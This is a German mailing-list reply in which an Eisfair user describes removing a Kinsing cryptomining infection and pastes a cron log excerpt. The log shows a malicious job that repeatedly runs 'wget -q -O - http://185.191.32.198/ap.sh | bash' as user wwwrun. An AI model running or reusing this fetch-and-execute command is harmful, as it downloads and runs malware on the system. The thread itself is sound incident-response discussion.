[Eisfair] Hilfe bei Entfernung von Malware benötigt. (kdevtmpfsi)

So Okt 17 13:24:52 CEST 2021

Hallo Detlef,

Am 17.10.2021 um 13:03 schrieb Detlef Paschke:
> 
> dann sind sie bei Dir evtl. nicht bis zum Ende gekommen.

oh doch, das glaube ich schon :/
Aber ich denke, mit dem Update welches ich zwischenzeitlich durchgeführt 
hatte war der Spuk vorbei - weil bei einem Neustart auch die Cron-Jobs 
neu generiert werden - ich hatte nämlich den Kernel ebenfalls mit 
geupdated ;)

> Noch mal schauen ob auch kein Prozess "kinsing" läuft.

nein nichts mehr zu finden.

> Auch schauen, ob noch andere Prozesse von wwwrun laufen, die man nicht
> zuordnen kann. Auf jeden Fall beide Dateien in /tmp löschen.
> Evtl. ist eine Datei /tmp/zzz da, die auch löschen.

/tmp/zzz gab es nicht - die anderen beiden Dateien habe ich gelöscht.

> In /var/log/messages schauen, ob dort minütlich ein dir unbekannter
> Cron-Job läuft.

ist bei mir separat in /var/log/cron und nicht in messages.
Hier ein Auszug wie es bei mir bis zum update ausgeschaut hat:

--- [Auszug] ---
Oct 11 09:31:00 eis fcron[15510]: Job 'wget -q -O - 
http://185.191.32.198/ap.sh | bash > /dev/null 2>&1' started for user 
wwwrun (pid 15521)
Oct 11 09:31:00 eis fcron[15510]: Job 'wget -q -O - 
http://185.191.32.198/ap.sh | bash > /dev/null 2>&1' completed
Oct 11 09:32:00 eis fcron[18947]: Job 'wget -q -O - 
http://185.191.32.198/ap.sh | bash > /dev/null 2>&1' started for user 
wwwrun (pid 18969)
Oct 11 09:32:00 eis fcron[18947]: Job 'wget -q -O - 
http://185.191.32.198/ap.sh | bash > /dev/null 2>&1' completed
Oct 11 09:33:00 eis fcron[22421]: Job 'wget -q -O - 
http://185.191.32.198/ap.sh | bash > /dev/null 2>&1' started for user 
wwwrun (pid 22445)
Oct 11 09:33:00 eis fcron[22421]: Job 'wget -q -O - 
http://185.191.32.198/ap.sh | bash > /dev/null 2>&1' completed
Oct 11 09:34:00 eis fcron[27896]: Job 'wget -q -O - 
http://185.191.32.198/ap.sh | bash > /dev/null 2>&1' started for user 
wwwrun (pid 27926)
Oct 11 09:34:00 eis fcron[27896]: Job 'wget -q -O - 
http://185.191.32.198/ap.sh | bash > /dev/null 2>&1' completed
Oct 11 09:34:42 eis fcrontab[1195]: installing file /tmp/fcr-PCb7WN for 
user root
Oct 11 09:34:42 eis fcron[7158]: updating configuration from 
/var/spool/fcron
Oct 11 09:34:42 eis fcron[7158]: adding new file root
Oct 11 09:34:42 eis fcrontab[1229]: installing file /tmp/fcr-9j9yDi for 
user wwwrun
Oct 11 09:34:42 eis fcron[7158]: updating configuration from 
/var/spool/fcron
Oct 11 09:34:42 eis fcron[7158]: adding new file wwwrun
Oct 11 09:34:42 eis fcron[7158]: SIGTERM signal received
Oct 11 09:34:42 eis fcron[7158]: Exiting with code 0
Oct 11 09:34:44 eis fcron[1314]: fcron[1314] 3.2.1 started
Oct 11 09:34:44 eis fcron[1314]: @reboot jobs will only be run at 
computer's startup.
Oct 11 09:34:44 eis fcron[1314]: updating configuration from 
/var/spool/fcron
Oct 11 09:34:44 eis fcron[1314]: adding file wwwrun
Oct 11 09:34:44 eis fcron[1314]: adding file root
Oct 11 09:35:04 eis fcron[3464]: Job '/var/nextcloud/nextcloud-cron.sh' 
started for user wwwrun (pid 3472)
Oct 11 09:35:04 eis fcron[3473]: Job '/var/owncloud/owncloud-cron.sh' 
started for user wwwrun (pid 3489)
Oct 11 09:35:04 eis fcron[3504]: Job '/usr/local/dyndns/bin/dyndns 
 >/dev/null' started for user root (pid 3518)
Oct 11 09:35:06 eis fcron[3473]: Job '/var/owncloud/owncloud-cron.sh' 
completed
Oct 11 09:35:07 eis fcron[3504]: Job '/usr/local/dyndns/bin/dyndns 
 >/dev/null' completed
Oct 11 09:35:07 eis fcron[3464]: Job '/var/nextcloud/nextcloud-cron.sh' 
completed
Oct 11 09:35:33 eis fcrontab[10023]: installing file /tmp/fcr-hYN2ab for 
user root
Oct 11 09:35:33 eis fcron[1314]: updating configuration from 
/var/spool/fcron
Oct 11 09:35:33 eis fcron[1314]: adding new file root
Oct 11 09:35:33 eis fcrontab[10034]: installing file /tmp/fcr-5OWag4 for 
user wwwrun
Oct 11 09:35:33 eis fcron[1314]: updating configuration from 
/var/spool/fcron
Oct 11 09:35:33 eis fcron[1314]: adding new file wwwrun
Oct 11 09:35:33 eis fcron[1314]: SIGTERM signal received
Oct 11 09:35:33 eis fcron[1314]: Exiting with code 0
Oct 11 09:35:35 eis fcron[10059]: fcron[10059] 3.2.1 started
--- [/Auszug] ---

Man sieht hier auch den Neustart - danach nichts auffälliges mehr zu 
beobachten.
Mein System hatte lt. Smartmon zwei mal einen Load von >3
Kinsing wird wohl zum mining benutzt.

Übrigens war mein System schon vor dem Update befallen - Auffälligkeiten 
konnte ich bis zum 06.10. zurück verfolgen :(
Wäre also nicht vermeidbar gewesen - jedoch die zwei Tage danach.
Übrigens hatte ich bei mir wohl von zwei bzw. drei verschiedenen 
IP-Netzen gleichzeitig Zugriffe... entweder haben sich da gleich zwei 
oder drei gleichzeitig ausgetobt oder jemand war auf mehrere 
Netzbereichen unterwegs :(

Wie auch immer - vielen Dank für die Hinweise und mögliche 
Behebungsmechanismen :)

Viele Grüße
Fabian

-- 
Diese E-Mail wurde von AVG auf Viren geprüft.
http://www.avg.com